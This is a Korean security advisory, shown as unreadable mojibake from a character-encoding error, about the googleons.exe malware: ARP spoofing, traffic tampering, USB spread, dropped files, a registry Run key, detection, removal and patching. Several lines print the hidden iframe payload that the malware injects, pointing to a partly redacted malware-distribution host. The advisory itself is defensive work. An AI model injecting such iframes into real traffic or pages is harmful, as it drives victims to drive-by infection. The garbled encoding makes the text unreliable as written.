¡à °³¿ä
o ÃÖ±Ù ±¹³»¿¡¼ ARP SpoofingÀ» ÅëÇØ °¨¿°µÇ°í, °¨¿° ½Ã ³×Æ®¿öÅ©¸¦ ¸¶ºñ ½ÃÅ°´Â ¾Ç¼ºÄڵ尡 µîÀåÇÏ¿© ÁÖÀÇ°¡ ÇÊ¿äÇÔ o ƯÈ÷ ³×Æ®¿öÅ© °ü¸®ÀÚ´Â ³»ºÎ ³×Æ®¿öÅ©¿¡¼ ARP Spoofing °ø°Ý ¿©ºÎ¸¦ ÁÖ±âÀûÀ¸·Î ŽÁöÇÏ°í °ø°Ý ±Ù¿øÁö¸¦ ÆľÇÇÏ¿© °ü·Ã ¾Ç¼ºÄڵ尡 ½ÇÇà ¹× ´Ù¿î·Îµå µÇÁö ¾Êµµ·Ï ÁÖÀÇ°¡ ÇÊ¿äÇÔ
¡à ÀüÆĹæ¹ý
o ÃÖÃÊ googleons.exe¿¡ °¨¿°µÈ PC´Â ARP Spoofing °ø°Ý - ÇØ´ç ¾Ç¼ºÄÚµå °¨¿°½Ã ³×Æ®¿öÅ©¿¡ Á¸ÀçÇϴ ȣ½ºÆ® ¹× °ÔÀÌÆ®¿þÀ̸¦ ´ë»óÀ¸·Î ARP Reply¸¦ Áö¼ÓÀûÀ¸·Î º¸³¿ - °ÔÀÌÆ®¿þÀÌÀÇ MAC ÁÖ¼Ò¿Í °ø°Ý´ë»ó È£½ºÆ®ÀÇ MAC ÁÖ¼Ò¸¦ À§Á¶ÇÏ´Â ARP Reply¸¦ Áö¼ÓÀûÀ¸·Î º¸³¿
o °¨¿°µÈ PC¿Í µ¿ÀÏ ³×Æ®¿öÅ©¿¡ ¿¬°áµÇ¾î Àִ ȣ½ºÆ®µéÀº °¨¿°µÈ PC¸¦ °ÔÀÌÆ®¿þÀÌ·Î ÀνÄÇÏ°Ô ÇÏ¿© ¸ðµç ÆÐŶÀ» ¸ð´ÏÅ͸µ ¹× º¯Á¶ ÇÒ ¼ö ÀÖÀ½ - ARP Spoofing°ø°ÝÀ¸·Î Á¤»ó È£½ºÆ®°¡ À¥ Á¢¼Ó ½Ã °¨¿° PC´Â ÆÐŶÀ» °¡·Îä°í ¾Æ·¡¿Í °°Àº Á¤º¸¸¦ »ðÀÔÇØ ¾Ç¼ºÄÚµå À¯Æ÷Áö »çÀÌÆ®·Î À¯µµ
"<iframe src=http://down.online[»ý·«].net/page/image/zzh.htm height=0></iframe>"
o ¾Ç¼ºÄÚµå À¯Æ÷Áö down.online[»ý·«].netÀ¸·Î À¯µµµÈ PCÁß ¾Æ·¡¿Í °°Àº À©µµ¿ì Ãë¾àÁ¡ ÆÐÄ¡°¡ ¾ÈµÈ »çÀÌÆ®´Â googleons.exe¿¡ °¨¿°µÊ
- MS05-025 - MS06-014 - MS07-017 - MS07-027
¡à ¾Ç¼ºÇàÀ§ (googleons.exe)
o °¨¿° PC¿Í µ¿ÀÏ ³×Æ®¿öÅ© ´ë¿ª ARP Spoofing °ø°Ý
o µ¿ÀÏ ³×Æ®¿öÅ©¿¡ Á¸ÀçÇÏ´Â PCµéÀÇ HTTP Åë½Å ÆÐŶ º¯Á¶ "<iframe src=http://down.online[»ý·«].net/page/image/zzh.htm height=0></iframe>" »ðÀÔ
o USB¸¦ ÅëÇÑ ¾Ç¼ºÄÚµå ÀüÆÄ
o °¨¿° PC¿¡ Á¸ÀçÇÏ´Â .html, tml, asp, php, jsp È®ÀåÀÚ¿¡ ¾Æ·¡¿Í °°Àº ¾Ç¼ºÄÚµå »ðÀÔ - "<iframe src=http://down.online[»ý·«].net/page/image/pd.htm height=0></iframe>"
o °¨¿°½Ã »ý¼ºµÇ´Â ÆÄÀÏ - C:\Document and Settings\[°èÁ¤]\Local Settings\Temp\ autoexec.bat (down.exe ÃÖÃÊ °¨¿° ¾Ç¼ºÄÚµå, googleons.exe¸¦ ´Ù¿î·Îµå ¹× ½ÇÇà) googleons.exe disocoo.exe (½ÇÇàµÚ »èÁ¦) npptools.dll Packet.dll WanPacket.dll yahoons.exe (½ÇÇàµÚ »èÁ¦) - C:\windows\system32\ (yahoons.exe ½ÇÇà¿¡ ÀÇÇØ »ý¼ºµÇ´Â ÆÄÀϵé) dllhost32.exe mh104.dll moyu103.dll mosou.exe mydata.exe nwizwmgjs.exe nwizwmgjs.dll nwizzhuxians.exe nwizzhuxians.dll RAV00xx.exeµî ´Ù¼ö
o ºÎÆà ÈÄ Àç½ÃÀÛ ÇÒ ¼ö ÀÖ´Â ·¹Áö½ºÆ®¸®¿¡ µî·Ï - HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run - À̸§ : svc - ÆÄÀÏ À̸§ : googleons.exe
¡à °¨¿°¿©ºÎ È®ÀÎ ¹× Ä¡·á¹æ¹ý
o °¨¿°¿©ºÎ È®ÀÎ - L3 ¶Ç´Â ¶ó¿ìÅÍ¿¡¼ °¨¿° PC È®ÀÎ Áߺ¹ MAC ÁÖ¼Ò IP È®ÀÎ (¾Ç¼ºÄÚµå °¨¿° IP È®ÀÎ) ¡Ø krcert ȨÆäÀÌÁö->±â¼ú¹®¼->ARP Spoofing °ø°Ý ¹× ´ëÃ¥ Âü°í
- ARP Spoofing ÇÇÇØ PC¿¡¼ °ø°Ý PC È®ÀÎ Àüü ³×Æ®¿öÅ© Ping ½ºÄµ Áߺ¹ MAC ÁÖ¼Ò IP È®ÀÎ
¡Ø krcert ȨÆäÀÌÁö->±â¼ú¹®¼->ARP Spoofing °ø°Ý ¹× ´ëÃ¥ Âü°í
- ¾Ç¼ºÄÚµå °¨¿° ¹× ARP Spoofing °ø°Ý PC È®ÀÎ C:\Document and Settings\[°èÁ¤]\Local Settings\Temp\googleons.exe Á¸Àç¿©ºÎ È®ÀÎ googleons.exe ÇÁ·Î¼¼½º ½ÇÇà¿©ºÎ È®ÀÎ [¾Æ·¡ Ä¡·á¹æ¹ý ÂüÁ¶]
o Ä¡·á¹æ¹ý - C:\Document and Settings\[°èÁ¤]\Local Settings\Temp\ ÇÏÀ§ ¾Ç¼ºÄÚµåµé »èÁ¦
- À©µµ¿ì ½Ã½ºÅÛ Æú´õ¿¡ Á¸ÀçÇÏ´Â ¾Ç¼ºÄÚµåµé »èÁ¦
- googleons.exe ÇÁ·Î¼¼½º ³¡³»±â "Ctrl" + "Alt" + "Del" Ŭ¸¯ ÈÄ ÇÁ·Î¼¼½º ¸Þ´º¿¡¼ googleons.exe ÇÁ·Î¼¼½º Á¾·á
- ·¹Áö½ºÆ®¸® »èÁ¦ googleons Àç½ÃÀÛ ·¹Áö½ºÆ®¸® »èÁ¦ ½ÃÀÛ ¡æ ½ÇÇà ¼±ÅÃ, "regedit" ÀÔ·Â ÈÄ ¾Ç¼ºÄڵ尡 »ý¼ºÇÑ ¾Æ·¡ÀÇ ·¹Áö½ºÆ®¸® »èÁ¦ HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
. ±âŸ ¾Ç¼ºÄÚµå ·¹Áö½ºÆ®¸® »èÁ¦ ½ÃÀÛ ¡æ ½ÇÇà ¼±ÅÃ, "regedit" ÀÔ·Â ÈÄ ¾Ç¼ºÄڵ尡 »ý¼ºÇÑ ¾Æ·¡ÀÇ ·¹Áö½ºÆ®¸® »èÁ¦ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
¡à ¿¹¹æ ¹æ¹ý
o °¨¿°À» À§ÇÑ »çÀü ¿¹¹æ ¹æ¹ý - À©µµ OS ÃֽŠÆÐÄ¡ ½Ç½Ã
|